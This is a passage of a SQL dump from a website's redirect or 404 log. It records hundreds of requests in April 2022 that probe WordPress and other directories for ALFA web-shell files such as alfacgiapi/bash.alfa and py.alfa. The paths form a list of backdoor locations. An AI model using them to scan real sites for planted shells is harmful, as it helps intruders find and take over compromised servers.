04:31:57','0000-00-00 00:00:00',301),(37152,'https://malehus.in.ua/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:32:04','0000-00-00 00:00:00',301),(37153,'https://malehus.in.ua/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:32:06','0000-00-00 00:00:00',301),(37154,'https://malehus.in.ua/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:32:08','0000-00-00 00:00:00',301),(37155,'https://malehus.in.ua/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:32:10','0000-00-00 00:00:00',301),(37156,'https://malehus.in.ua/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:32:11','0000-00-00 00:00:00',301),(37157,'https://malehus.in.ua/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:32:14','0000-00-00 00:00:00',301),(37158,'https://malehus.in.ua/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:32:16','0000-00-00 00:00:00',301),(37159,'https://malehus.in.ua/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:32:18','0000-00-00 00:00:00',301),(37160,'https://malehus.in.ua/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:32:19','0000-00-00 00:00:00',301),(37161,'https://malehus.in.ua/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:32:20','0000-00-00 00:00:00',301),(37162,'https://malehus.in.ua/wp-content/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:32:24','0000-00-00 00:00:00',301),(37163,'https://malehus.in.ua/wp-content/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:32:26','0000-00-00 00:00:00',301),(37164,'https://malehus.in.ua/wp-content/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:32:28','0000-00-00 00:00:00',301),(37165,'https://malehus.in.ua/wp-content/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:32:29','0000-00-00 00:00:00',301),(37166,'https://malehus.in.ua/wp-content/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:32:30','0000-00-00 00:00:00',301),(37167,'https://malehus.in.ua/wp-content/alfa_data/alfacgiapi/wp-content/uploads/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:32:31','0000-00-00 00:00:00',301),(37168,'https://malehus.in.ua/wp-content/alfa_data/alfacgiapi/wp-content/uploads/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:32:33','0000-00-00 00:00:00',301),(37169,'https://malehus.in.ua/wp-content/alfa_data/alfacgiapi/wp-content/uploads/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:32:35','0000-00-00 00:00:00',301),(37170,'https://malehus.in.ua/wp-content/alfa_data/alfacgiapi/wp-content/uploads/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:32:37','0000-00-00 00:00:00',301),(37171,'https://malehus.in.ua/wp-content/alfa_data/alfacgiapi/wp-content/uploads/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:32:38','0000-00-00 00:00:00',301),(37172,'https://malehus.in.ua/wp-content/alfa_data/alfacgiapi/wp-content/uploads/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:32:39','0000-00-00 00:00:00',301),(37173,'https://malehus.in.ua/wp-content/uploads/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:32:40','0000-00-00 00:00:00',301),(37174,'https://malehus.in.ua/wp-content/uploads/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:32:42','0000-00-00 00:00:00',301),(37175,'https://malehus.in.ua/wp-content/uploads/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:32:43','0000-00-00 00:00:00',301),(37176,'https://malehus.in.ua/wp-content/uploads/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:32:45','0000-00-00 00:00:00',301),(37177,'https://malehus.in.ua/wp-content/uploads/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:32:47','0000-00-00 00:00:00',301),(37178,'https://malehus.in.ua/wp-content/uploads/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:32:48','0000-00-00 00:00:00',301),(37179,'https://malehus.in.ua/wp-content/plugins/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:32:49','0000-00-00 00:00:00',301),(37180,'https://malehus.in.ua/wp-content/plugins/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:32:51','0000-00-00 00:00:00',301),(37181,'https://malehus.in.ua/wp-content/plugins/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:32:53','0000-00-00 00:00:00',301),(37182,'https://malehus.in.ua/wp-content/plugins/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:32:56','0000-00-00 00:00:00',301),(37183,'https://malehus.in.ua/wp-content/plugins/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:32:57','0000-00-00 00:00:00',301),(37184,'https://malehus.in.ua/wp-content/plugins/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:32:58','0000-00-00 00:00:00',301),(37185,'https://malehus.in.ua/wp-content/plugins/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:32:59','0000-00-00 00:00:00',301),(37186,'https://malehus.in.ua/wp-content/plugins/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:33:01','0000-00-00 00:00:00',301),(37187,'https://malehus.in.ua/wp-content/plugins/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:33:04','0000-00-00 00:00:00',301),(37188,'https://malehus.in.ua/wp-content/plugins/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:33:06','0000-00-00 00:00:00',301),(37189,'https://malehus.in.ua/wp-content/plugins/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:33:07','0000-00-00 00:00:00',301),(37190,'https://malehus.in.ua/wp-content/plugins/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:33:08','0000-00-00 00:00:00',301),(37191,'https://malehus.in.ua/wp-content/themes/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:33:10','0000-00-00 00:00:00',301),(37192,'https://malehus.in.ua/wp-content/themes/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:33:11','0000-00-00 00:00:00',301),(37193,'https://malehus.in.ua/wp-content/themes/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:33:14','0000-00-00 00:00:00',301),(37194,'https://malehus.in.ua/wp-content/themes/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:33:16','0000-00-00 00:00:00',301),(37195,'https://malehus.in.ua/wp-content/themes/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:33:17','0000-00-00 00:00:00',301),(37196,'https://malehus.in.ua/wp-content/themes/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:33:18','0000-00-00 00:00:00',301),(37197,'https://malehus.in.ua/wp-content/themes/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:33:19','0000-00-00 00:00:00',301),(37198,'https://malehus.in.ua/wp-content/themes/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:33:22','0000-00-00 00:00:00',301),(37199,'https://malehus.in.ua/wp-content/themes/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:33:24','0000-00-00 00:00:00',301),(37200,'https://malehus.in.ua/wp-content/themes/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:33:27','0000-00-00 00:00:00',301),(37201,'https://malehus.in.ua/wp-content/themes/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:33:28','0000-00-00 00:00:00',301),(37202,'https://malehus.in.ua/wp-content/themes/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:33:29','0000-00-00 00:00:00',301),(37203,'https://malehus.in.ua/wp-content/upgrade/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:33:30','0000-00-00 00:00:00',301),(37204,'https://malehus.in.ua/wp-content/upgrade/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:33:32','0000-00-00 00:00:00',301),(37205,'https://malehus.in.ua/wp-content/upgrade/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:33:34','0000-00-00 00:00:00',301),(37206,'https://malehus.in.ua/wp-content/upgrade/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:33:37','0000-00-00 00:00:00',301),(37207,'https://malehus.in.ua/wp-content/upgrade/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:33:38','0000-00-00 00:00:00',301),(37208,'https://malehus.in.ua/wp-content/upgrade/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:33:39','0000-00-00 00:00:00',301),(37209,'https://malehus.in.ua/wp-content/upgrade/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:33:40','0000-00-00 00:00:00',301),(37210,'https://malehus.in.ua/wp-content/upgrade/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:33:43','0000-00-00 00:00:00',301),(37211,'https://malehus.in.ua/wp-content/upgrade/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:33:45','0000-00-00 00:00:00',301),(37212,'https://malehus.in.ua/wp-content/upgrade/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:33:47','0000-00-00 00:00:00',301),(37213,'https://malehus.in.ua/wp-content/upgrade/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:33:48','0000-00-00 00:00:00',301),(37214,'https://malehus.in.ua/wp-content/upgrade/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:33:50','0000-00-00 00:00:00',301),(37215,'https://malehus.in.ua/wp-content/updraft/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:33:51','0000-00-00 00:00:00',301),(37216,'https://malehus.in.ua/wp-content/updraft/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:33:53','0000-00-00 00:00:00',301),(37217,'https://malehus.in.ua/wp-content/updraft/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:33:54','0000-00-00 00:00:00',301),(37218,'https://malehus.in.ua/wp-content/updraft/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:33:56','0000-00-00 00:00:00',301),(37219,'https://malehus.in.ua/wp-content/updraft/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:33:57','0000-00-00 00:00:00',301),(37220,'https://malehus.in.ua/wp-content/updraft/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:33:58','0000-00-00 00:00:00',301),(37221,'https://malehus.in.ua/wp-content/updraft/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:33:59','0000-00-00 00:00:00',301),(37222,'https://malehus.in.ua/wp-content/updraft/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:34:00','0000-00-00 00:00:00',301),(37223,'https://malehus.in.ua/wp-content/updraft/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:34:02','0000-00-00 00:00:00',301),(37224,'https://malehus.in.ua/wp-content/updraft/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:34:03','0000-00-00 00:00:00',301),(37225,'https://malehus.in.ua/wp-content/updraft/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:34:04','0000-00-00 00:00:00',301),(37226,'https://malehus.in.ua/wp-content/updraft/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:34:05','0000-00-00 00:00:00',301),(37227,'https://malehus.in.ua/wp-content/plugins/cekidot/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:34:06','0000-00-00 00:00:00',301),(37228,'https://malehus.in.ua/wp-content/plugins/cekidot/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:34:08','0000-00-00 00:00:00',301),(37229,'https://malehus.in.ua/wp-content/plugins/cekidot/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:34:10','0000-00-00 00:00:00',301),(37230,'https://malehus.in.ua/wp-content/plugins/cekidot/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:34:12','0000-00-00 00:00:00',301),(37231,'https://malehus.in.ua/wp-content/plugins/cekidot/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:34:12','0000-00-00 00:00:00',301),(37232,'https://malehus.in.ua/wp-content/plugins/cekidot/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:34:13','0000-00-00 00:00:00',301),(37233,'https://malehus.in.ua/wp-content/plugins/cekidot/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:34:14','0000-00-00 00:00:00',301),(37234,'https://malehus.in.ua/wp-content/plugins/cekidot/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:34:16','0000-00-00 00:00:00',301),(37235,'https://malehus.in.ua/wp-content/plugins/cekidot/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:34:18','0000-00-00 00:00:00',301),(37236,'https://malehus.in.ua/wp-content/plugins/cekidot/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:34:20','0000-00-00 00:00:00',301),(37237,'https://malehus.in.ua/wp-content/plugins/cekidot/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:34:21','0000-00-00 00:00:00',301),(37238,'https://malehus.in.ua/wp-content/plugins/cekidot/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:34:22','0000-00-00 00:00:00',301),(37239,'https://malehus.in.ua/wp-content/plugins/library/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:34:22','0000-00-00 00:00:00',301),(37240,'https://malehus.in.ua/wp-content/plugins/library/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:34:25','0000-00-00 00:00:00',301),(37241,'https://malehus.in.ua/wp-content/plugins/library/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:34:26','0000-00-00 00:00:00',301),(37242,'https://malehus.in.ua/wp-content/plugins/library/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:34:28','0000-00-00 00:00:00',301),(37243,'https://malehus.in.ua/wp-content/plugins/library/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:34:29','0000-00-00 00:00:00',301),(37244,'https://malehus.in.ua/wp-content/plugins/library/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:34:30','0000-00-00 00:00:00',301),(37245,'https://malehus.in.ua/wp-content/plugins/library/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:34:31','0000-00-00 00:00:00',301),(37246,'https://malehus.in.ua/wp-content/plugins/library/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:34:33','0000-00-00 00:00:00',301),(37247,'https://malehus.in.ua/wp-content/plugins/library/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:34:35','0000-00-00 00:00:00',301),(37248,'https://malehus.in.ua/wp-content/plugins/library/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:34:37','0000-00-00 00:00:00',301),(37249,'https://malehus.in.ua/wp-content/plugins/library/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:34:38','0000-00-00 00:00:00',301),(37250,'https://malehus.in.ua/wp-content/plugins/library/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:34:39','0000-00-00 00:00:00',301),(37251,'https://malehus.in.ua/wp-admin/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:34:40','0000-00-00 00:00:00',301),(37252,'https://malehus.in.ua/wp-admin/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:34:42','0000-00-00 00:00:00',301),(37253,'https://malehus.in.ua/wp-admin/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:34:44','0000-00-00 00:00:00',301),(37254,'https://malehus.in.ua/wp-admin/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:34:45','0000-00-00 00:00:00',301),(37255,'https://malehus.in.ua/wp-admin/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:34:46','0000-00-00 00:00:00',301),(37256,'https://malehus.in.ua/wp-admin/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:34:47','0000-00-00 00:00:00',301),(37257,'https://malehus.in.ua/wp-admin/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:34:48','0000-00-00 00:00:00',301),(37258,'https://malehus.in.ua/wp-admin/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:34:50','0000-00-00 00:00:00',301),(37259,'https://malehus.in.ua/wp-admin/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:34:52','0000-00-00 00:00:00',301),(37260,'https://malehus.in.ua/wp-admin/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:34:53','0000-00-00 00:00:00',301),(37261,'https://malehus.in.ua/wp-admin/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:34:54','0000-00-00 00:00:00',301),(37262,'https://malehus.in.ua/wp-admin/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:34:55','0000-00-00 00:00:00',301),(37263,'https://malehus.in.ua/wp-includes/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:34:56','0000-00-00 00:00:00',301),(37264,'https://malehus.in.ua/wp-includes/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:34:58','0000-00-00 00:00:00',301),(37265,'https://malehus.in.ua/wp-includes/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:35:00','0000-00-00 00:00:00',301),(37266,'https://malehus.in.ua/wp-includes/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:35:02','0000-00-00 00:00:00',301),(37267,'https://malehus.in.ua/wp-includes/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:35:03','0000-00-00 00:00:00',301),(37268,'https://malehus.in.ua/wp-includes/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:35:04','0000-00-00 00:00:00',301),(37269,'https://malehus.in.ua/wp-includes/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:35:05','0000-00-00 00:00:00',301),(37270,'https://malehus.in.ua/wp-includes/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:35:07','0000-00-00 00:00:00',301),(37271,'https://malehus.in.ua/wp-includes/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:35:08','0000-00-00 00:00:00',301),(37272,'https://malehus.in.ua/wp-includes/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:35:09','0000-00-00 00:00:00',301),(37273,'https://malehus.in.ua/wp-includes/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:35:10','0000-00-00 00:00:00',301),(37274,'https://malehus.in.ua/wp-includes/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:35:11','0000-00-00 00:00:00',301),(37275,'https://malehus.in.ua/.tmb/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:36:03','0000-00-00 00:00:00',301),(37276,'https://malehus.in.ua/.tmb/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:36:05','0000-00-00 00:00:00',301),(37277,'https://malehus.in.ua/.tmb/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:36:07','0000-00-00 00:00:00',301),(37278,'https://malehus.in.ua/.tmb/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:36:08','0000-00-00 00:00:00',301),(37279,'https://malehus.in.ua/.tmb/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:36:09','0000-00-00 00:00:00',301),(37280,'https://malehus.in.ua/.tmb/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:36:10','0000-00-00 00:00:00',301),(37281,'https://malehus.in.ua/.tmb/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:36:11','0000-00-00 00:00:00',301),(37282,'https://malehus.in.ua/.tmb/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:36:13','0000-00-00 00:00:00',301),(37283,'https://malehus.in.ua/.tmb/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:36:15','0000-00-00 00:00:00',301),(37284,'https://malehus.in.ua/.tmb/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:36:17','0000-00-00 00:00:00',301),(37285,'https://malehus.in.ua/.tmb/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:36:19','0000-00-00 00:00:00',301),(37286,'https://malehus.in.ua/.tmb/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:36:20','0000-00-00 00:00:00',301),(37287,'https://malehus.in.ua/.quarantine/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:36:21','0000-00-00 00:00:00',301),(37288,'https://malehus.in.ua/.quarantine/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:36:23','0000-00-00 00:00:00',301),(37289,'https://malehus.in.ua/.quarantine/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:36:25','0000-00-00 00:00:00',301),(37290,'https://malehus.in.ua/.quarantine/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:36:26','0000-00-00 00:00:00',301),(37291,'https://malehus.in.ua/.quarantine/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:36:27','0000-00-00 00:00:00',301),(37292,'https://malehus.in.ua/.quarantine/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:36:28','0000-00-00 00:00:00',301),(37293,'https://malehus.in.ua/.quarantine/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:36:29','0000-00-00 00:00:00',301),(37294,'https://malehus.in.ua/.quarantine/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:36:31','0000-00-00 00:00:00',301),(37295,'https://malehus.in.ua/.quarantine/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:36:33','0000-00-00 00:00:00',301),(37296,'https://malehus.in.ua/.quarantine/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:36:35','0000-00-00 00:00:00',301),(37297,'https://malehus.in.ua/.quarantine/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:36:36','0000-00-00 00:00:00',301),(37298,'https://malehus.in.ua/.quarantine/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:36:37','0000-00-00 00:00:00',301),(37299,'https://malehus.in.ua/images/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:36:56','0000-00-00 00:00:00',301),(37300,'https://malehus.in.ua/images/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:36:58','0000-00-00 00:00:00',301),(37301,'https://malehus.in.ua/images/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:37:01','0000-00-00 00:00:00',301),(37302,'https://malehus.in.ua/images/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:37:03','0000-00-00 00:00:00',301),(37303,'https://malehus.in.ua/images/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:37:04','0000-00-00 00:00:00',301),(37304,'https://malehus.in.ua/images/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:37:05','0000-00-00 00:00:00',301),(37305,'https://malehus.in.ua/images/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:37:06','0000-00-00 00:00:00',301),(37306,'https://malehus.in.ua/images/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:37:09','0000-00-00 00:00:00',301),(37307,'https://malehus.in.ua/images/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:37:11','0000-00-00 00:00:00',301),(37308,'https://malehus.in.ua/images/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:37:13','0000-00-00 00:00:00',301),(37309,'https://malehus.in.ua/images/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:37:14','0000-00-00 00:00:00',301),(37310,'https://malehus.in.ua/images/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:37:15','0000-00-00 00:00:00',301),(37311,'https://malehus.in.ua/components/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:37:16','0000-00-00 00:00:00',301),(37312,'https://malehus.in.ua/components/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:37:18','0000-00-00 00:00:00',301),(37313,'https://malehus.in.ua/components/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:37:20','0000-00-00 00:00:00',301),(37314,'https://malehus.in.ua/components/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:37:21','0000-00-00 00:00:00',301),(37315,'https://malehus.in.ua/components/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:37:22','0000-00-00 00:00:00',301),(37316,'https://malehus.in.ua/components/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:37:23','0000-00-00 00:00:00',301),(37317,'https://malehus.in.ua/components/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:37:24','0000-00-00 00:00:00',301),(37318,'https://malehus.in.ua/components/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:37:25','0000-00-00 00:00:00',301),(37319,'https://malehus.in.ua/components/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:37:27','0000-00-00 00:00:00',301),(37320,'https://malehus.in.ua/components/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:37:29','0000-00-00 00:00:00',301),(37321,'https://malehus.in.ua/components/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:37:30','0000-00-00 00:00:00',301),(37322,'https://malehus.in.ua/components/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:37:30','0000-00-00 00:00:00',301),(37323,'https://malehus.in.ua/wordpress/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:37:31','0000-00-00 00:00:00',301),(37324,'https://malehus.in.ua/wordpress/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:37:33','0000-00-00 00:00:00',301),(37325,'https://malehus.in.ua/wordpress/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:37:35','0000-00-00 00:00:00',301),(37326,'https://malehus.in.ua/wordpress/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:37:37','0000-00-00 00:00:00',301),(37327,'https://malehus.in.ua/wordpress/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:37:38','0000-00-00 00:00:00',301),(37328,'https://malehus.in.ua/wordpress/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:37:39','0000-00-00 00:00:00',301),(37329,'https://malehus.in.ua/wordpress/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:37:40','0000-00-00 00:00:00',301),(37330,'https://malehus.in.ua/wordpress/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:37:41','0000-00-00 00:00:00',301),(37331,'https://malehus.in.ua/wordpress/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:37:43','0000-00-00 00:00:00',301),(37332,'https://malehus.in.ua/wordpress/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:37:45','0000-00-00 00:00:00',301),(37333,'https://malehus.in.ua/wordpress/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:37:46','0000-00-00 00:00:00',301),(37334,'https://malehus.in.ua/wordpress/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:37:47','0000-00-00 00:00:00',301),(37335,'https://malehus.in.ua/wp/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:37:48','0000-00-00 00:00:00',301),(37336,'https://malehus.in.ua/wp/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:37:50','0000-00-00 00:00:00',301),(37337,'https://malehus.in.ua/wp/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:37:53','0000-00-00 00:00:00',301),(37338,'https://malehus.in.ua/wp/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:37:55','0000-00-00 00:00:00',301),(37339,'https://malehus.in.ua/wp/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:37:56','0000-00-00 